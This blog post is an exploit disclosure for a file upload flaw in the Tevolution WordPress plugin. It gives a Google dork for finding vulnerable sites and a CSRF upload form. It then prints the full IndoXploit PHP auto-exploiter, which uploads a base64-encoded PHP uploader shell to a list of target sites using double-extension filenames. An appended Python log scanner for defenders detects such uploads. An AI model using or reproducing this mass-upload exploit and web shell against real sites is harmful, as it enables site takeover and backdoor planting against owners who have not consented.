Saturday, February 18, 2017
Wordpress Tevolution Plugin File Upload Vulnerability
#- Author: unknown
#- Date: 2016
#- Developer : templatic
#- Link Download : templatic.com/wordpress-plugins/tevolution
#- Google Dork: inurl:"/plugins/Tevolution/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
The Tevolution WordPress plugin enables advanced functionality in our themes. Some of the features it enables include custom post types, monetization options, custom fields.
Cool thing about Tevolution is the fact it's modular, meaning you can turn off the features you do not need.
Vulnerability : site/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
When Vulnerable : Maybe "Blank"
-- Method --
CSRF
<form
action="http://3xploi7.blogspot.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>
Tevolution Auto Exploit Coded by IndoXploit
<html>
<center>
<form method="post" enctype="multipart/form-data">
Shellname: <br><input type="text" name=filename style=width: 500px; height="10" value=indoxploit.php.xxxjpg required><br>
Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
<input type=submit name=exp value=Hajar! style=width: 500px;>
</form>
<?php
// IndoXploit
set_time_limit(0);
error_reporting(0);
function buffer() {
ob_flush();
flush();
}
function curl($url, $payload) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_COOKIEJAR, cookie.txt);
curl_setopt($ch, CURLOPT_COOKIEFILE, cookie.txt);
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER[HTTP_USER_AGENT]);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
$file = htmlspecialchars($_POST[filename]);
$site = explode(" ", $_POST[url]);
$do = $_POST[exp];
$uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
if($do) {
$y = date("Y");
$m = date("m");
$idx_dir = mkdir("indoxploit_tools", 0755);
$shell = "indoxploit_tools/".$file;
$fopen = fopen($shell, "w");
fwrite($fopen, $uploader);
fclose($fopen);
foreach($site as $url) {
$target = $url./wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php;
$cek_shell = "$url/wp-content/uploads/$y/$m/$file";
$data = array(
"Filedata" => "@$shell"
);
$curl = curl($target, $data);
if($curl) {
$cek = file_get_contents($cek_shell);
if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
echo "<a href=$cek_shell target=_blank>$cek_shell</a> -> shellmu<br>";
}
}
buffer();
}
}
?>
Format Shell > php, php4, php5, php.xxxjpg, php.asp Etc.
If Successfully [3xploi7.php4]
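
For defenders, one way to hunt for this activity in web server access logs (an added example, not part of the original post): it flags POST requests to the single-upload.php path named above and successful requests for script-extension files under wp-content/uploads/YYYY/MM/, including double extensions such as php.xxxjpg. The combined log format, the function name scan and the sample log lines are assumptions constructed for illustration.

```python
import re

# Path of the upload handler named on this page (compared case-insensitively).
UPLOAD_ENDPOINT = ("/wp-content/plugins/tevolution/tmplconnector/monetize/"
                   "templatic-custom_fields/single-upload.php")
# A file under uploads/YYYY/MM/ whose name has a script extension in ANY
# dot-separated segment, so "x.php.xxxjpg" and "x.php.asp" are caught too.
SCRIPT_IN_UPLOADS = re.compile(
    r"/wp-content/uploads/\d{4}/\d{2}/[^/?]*\.(?:php\d?|asp)(?:[.?]|$)", re.I)
# Assumed combined log format: ip - user [time] "METHOD path PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def scan(lines):
    """Return (line_no, client_ip, reason) findings for one access log."""
    findings = []
    uploaders = set()  # client IPs that POSTed to the upload handler
    for no, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path, status = m["ip"], m["method"], m["path"], m["status"]
        if method == "POST" and path.split("?")[0].lower() == UPLOAD_ENDPOINT:
            uploaders.add(ip)
            findings.append((no, ip, "POST to single-upload.php"))
        elif SCRIPT_IN_UPLOADS.search(path) and status.startswith("2"):
            reason = "script served from uploads"
            if ip in uploaders:
                reason += " after upload POST from same client"
            findings.append((no, ip, reason))
    return findings

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Feb/2017:10:00:01 +0000] "GET / HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Feb/2017:10:00:05 +0000] "POST /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php HTTP/1.1" 200 0',
    '203.0.113.9 - - [18/Feb/2017:10:00:06 +0000] "GET /wp-content/uploads/2017/02/sample.php.xxxjpg HTTP/1.1" 200 310',
    '198.51.100.7 - - [18/Feb/2017:10:01:00 +0000] "GET /wp-content/uploads/2017/02/photo.jpg HTTP/1.1" 200 80211',
    '198.51.100.8 - - [18/Feb/2017:10:02:00 +0000] "GET /wp-content/uploads/2017/02/old.php5 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding of the second kind means the web server is serving script-named files from the uploads directory; whether they execute depends on the server's handler configuration.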